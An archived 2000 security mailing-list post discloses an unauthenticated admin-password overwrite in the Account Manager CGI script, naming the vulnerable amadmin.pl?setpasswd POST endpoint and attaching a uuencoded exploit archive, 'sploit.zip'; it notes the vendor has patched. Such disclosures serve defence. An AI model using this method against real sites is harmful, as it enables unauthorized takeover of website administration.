|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Subject: Account Manager CGI Vulnerability
From: n30 (n30
ALLDAS.DE)Date: Wed Aug 23 2000 - 21:06:13 CDT
- Next message: n30: "Subscribe Me Vulnerability"
- Previous message: bugzillaREDHAT.COM: "[RHSA-2000:055-03] XChat can pass URLs from IRC to a shell"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Product: Account Manager
Versions: ALL including LITE and PRO haven't been able to test ENTERPRISE
OS: Unix and Winnt
Vendor: Notified, http://www.cgiscriptcenter.com/
The Problem:
The Script allows any remote user access to the Administration Control
Panel through overwriting the Admin Password with one of their own making :). This
is possible since the script parses the inputted data with total disregard for whether
the current userhas Admin priveleges. Therefore calling
www.server.com/cgibin/amadmin.pl?setpasswd
using a POST command would allow the password to be altered.
Using this exploit would give a remote user access to add and remove
users from protected areas of your website perphaps to other more interesting CGI's ;P.
Exploit:
See the .zip file Attached
Patches:
Already Available see website, download version is patched.
n30
n30alldas.de
www.alldas.de
begin 666 sploit.zip
M4$L#!!0```(`(IS%RG=)HE/E (``-P&```+````17AP;&]I="YH=&VM5=]O
MVC 0?D?B?SB\UP;3;GNIDFBA"242D"Q0]V;F[C%6A*CQ&W:_?6[$'X,-E2J
M#BG'.>[[^X[?S9'030%YX;YP<PB2ZU7UY36==U/1:*:IY^HG":/TKB7!>5)
MHG..OSE/<UGT5QF!J<?&6N1,(9L<T;;\:\R#:'D=WMF,P93CP8!I'K1189
M$%CX+AM;Y,O7`?JR8>#>X99XGJC>+NP3;JS1,$"OQG&8VZW^:8.1&SR"7N
M#C&);8Z"&8.1<^-9Y%F4*2_X!?!2\NP"EB)[%EHFG+1NZP`!XOT&WP0VPG
M2=13H6&*VQY%"1.?>32,`I,V_O8U0,BKJE9E"M[+*E-2]S9_F11ST["I<5OQ
M.Y <XR^#X[B8_:L)W,2._1\8V[D;V<),\$K`:+06-6K>BIAM2U$US(1
M?8"2 1H!970(#4&*5)0&UNBB=9YFCO[W =U'K,ZVDN3W/:[32LC/Q;W'T
M(O]VS <4NS/PCD#=A=BM:$3QPM,2&#F3/%]5:?H09E[/!M7Y+!?5V?T:]N=
M7;5-6,K:&8X^BO/J_P'=,,.U5,7;8%NZCM'BT6P1=SLMY'^G/IL"Q'HNDM
M?'<F<WP%B'%"=N<`]K7 82E-V!T4D[8TT\U<T/7$[,?Z<)*ZG7](Q.#C$C&.
M-KV])']B.Z=)K6"\QD4HU-R`DZCEFT/Q5Y+D*[U:7?LOYA\LWUG>QX)U+8=
M9]734 I,P1RE9*I2^? *,6H):0:0R6Q5!2+_66 ^'8P5L/1UJ4&!O60]$\
M'):E>+!(SF6FU34*WC>>92FO\*(A=F,U<F%2?"<-I<3+G#9,PR(E^I)_VI2
MZE+>(^87455KW<)04"\5_"Q4#;GH6'MM]02P$"% `4``(`" "*<Q<IW2:)
M3Y0"``#<!``"P`````````!`" `MH$`````17AP;&]I="YH=&U02P4&````
/``$``0`Y````O0(`````
`
end
- Next message: n30: "Subscribe Me Vulnerability"
- Previous message: bugzillaREDHAT.COM: "[RHSA-2000:055-03] XChat can pass URLs from IRC to a shell"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]